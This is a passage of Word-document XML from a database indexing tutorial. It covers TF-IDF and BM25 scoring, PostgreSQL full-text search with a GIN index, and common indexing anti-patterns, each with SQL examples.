        <w:t>TF-IDF (Term Frequency × Inverse Document Frequency):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939E102" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C79D4F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>TF(term, doc) = occurrences of term in doc / total terms in doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB7C90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>IDF(term) = log(total_docs / docs_containing_term)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D169E1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Score = TF × IDF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BCBDC3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7EC8CC02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>High score: term appears frequently in THIS document but rarely overall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784777B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Low score: term appears in almost every document ("the", "is", "a").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C78AA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BM25 (the standard in modern search — Elasticsearch, Lucene):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F2247" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2772D011" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>An improved variant of TF-IDF with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4E095" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Saturation: TF gains diminish (10th occurrence adds less than 2nd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2248AE1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Document length normalization: long documents don't unfairly dominate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C5D49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Tunable parameters (k1, b) for domain-specific adjustment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A38FAF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 PostgreSQL Full-Text Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC286E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6537E777" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Create a tsvector column (pre-computed tokens + positions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7A277" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ALTER TABLE articles ADD COLUMN search_vector tsvector;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE067BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>UPDATE articles SET search_vector = to_tsvector('english', title || ' ' || body);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF822C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6C5A64A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Create GIN index on the tsvector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D48EB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_search ON articles USING gin(search_vector);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F741545" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7360A52C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query with ranking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD7029" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT title, ts_rank(search_vector, query) as rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B4B361" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM articles, to_tsquery('english', 'database &amp; indexing') query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C526BF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE search_vector @@ query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31042FB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ORDER BY rank DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6F1EC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>LIMIT 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BA2EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="5C87F06B">
          <v:rect id="_x0000_i5333" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C66723" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Indexing Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6FB262" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Indexing Every Column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B3F6E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> "Let's add an index on every column so all queries are fast."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D331C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's wrong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E6BF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Each index slows writes (INSERT/UPDATE/DELETE must maintain all indexes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D010F24" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Each index consumes RAM (buffer pool / page cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEB032" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Optimizer may choose wrong index (more choices = more room for bad decisions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA3905" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Many indexes will be unused (pure overhead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A39E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Wrong Column Order in Composite Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C1886" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F5C312" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query: WHERE customer_id = ? AND created_at &gt; '2024-01-01'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D493CB6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2DAB14A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- BAD index: (created_at, customer_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1743C19B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   Can't use customer_id efficiently (it's after the range column)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D670B9C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>--   Scans all rows since 2024-01-01 across ALL customers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15353146" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="34AFF67D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- GOOD index: (customer_id, created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FEBC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   Seeks to specific customer, then scans date range within that customer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75543CDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   Reads only that customer's recent rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF6D0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Indexing Low-Cardinality Columns with B-Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7A7A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE764EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- BAD: B-Tree index on a boolean column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E176E80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_active ON users(is_active);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F70A41" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- With 50/50 distribution: index scan still reads 50% of table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07512CDE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Full scan is likely faster (sequential I/O beats random)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032FE8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4F5BCF52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- BETTER: Partial index if one value is rare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D58CE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_inactive ON users(id) WHERE is_active = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B48C69" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Only useful if inactive users are rare (5%) and queried specifically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B6D1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Over-Indexing for Write-Heavy Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515CA9F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B34D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Event/log table: 100,000 inserts/sec, rarely queried</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6F858" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE TABLE events (id BIGINT, type TEXT, data JSONB, created_at TIMESTAMP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A21272" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="45AA8E62" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- BAD: 5 indexes on a high-write table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B251FD1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx1 ON events(type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A426314" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx2 ON events(created_at);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDFBB0C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx3 ON events(type, created_at);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517B1D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx4 ON events((data-&gt;&gt;'user_id'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DA5DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx5 ON events((data-&gt;&gt;'category'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA13B05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- 100K inserts × 5 index updates = 500K index writes/sec → enormous overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536214F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="74CA517E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- BETTER: 1–2 essential indexes, use BRIN for timestamp (tiny overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A536DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON events USING brin(created_at);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D360836" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Or: no indexes on the hot write table. Replicate to a read replica for queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5D03E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.5 Not Using INCLUDE (Covering) When Possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67729F15" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DCA30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query: SELECT name, email FROM users WHERE user_id = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5259F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="54516FD4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Suboptimal: Index on (user_id) only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533C0CD4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   Find user_id in index → heap fetch to get name, email → random I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C501AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3DDE0976" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Optimal: Covering index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DD5E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON users(user_id) INCLUDE (name, email);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2BC55" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>--   Find user_id in index → name and email are RIGHT THERE → no heap fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1FC712" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.6 Functions on Indexed Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124CE3D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08C5B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- BAD: Function on the indexed column prevents index usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794CE60" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE LOWER(email) = 'alice@example.com';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDFFC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Has index on email, but LOWER() makes it unusable!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0988E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3ED4B338" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC4DE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- 1. Expression index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04745EC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON users(LOWER(email));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F638D17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2928B08A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- 2. Store normalized data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909580E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>ALTER TABLE users ADD COLUMN email_lower TEXT GENERATED ALWAYS AS (LOWER(email)) STORED;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1683D439" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON users(email_lower);</w:t>
      </w:r>
    </w:p>
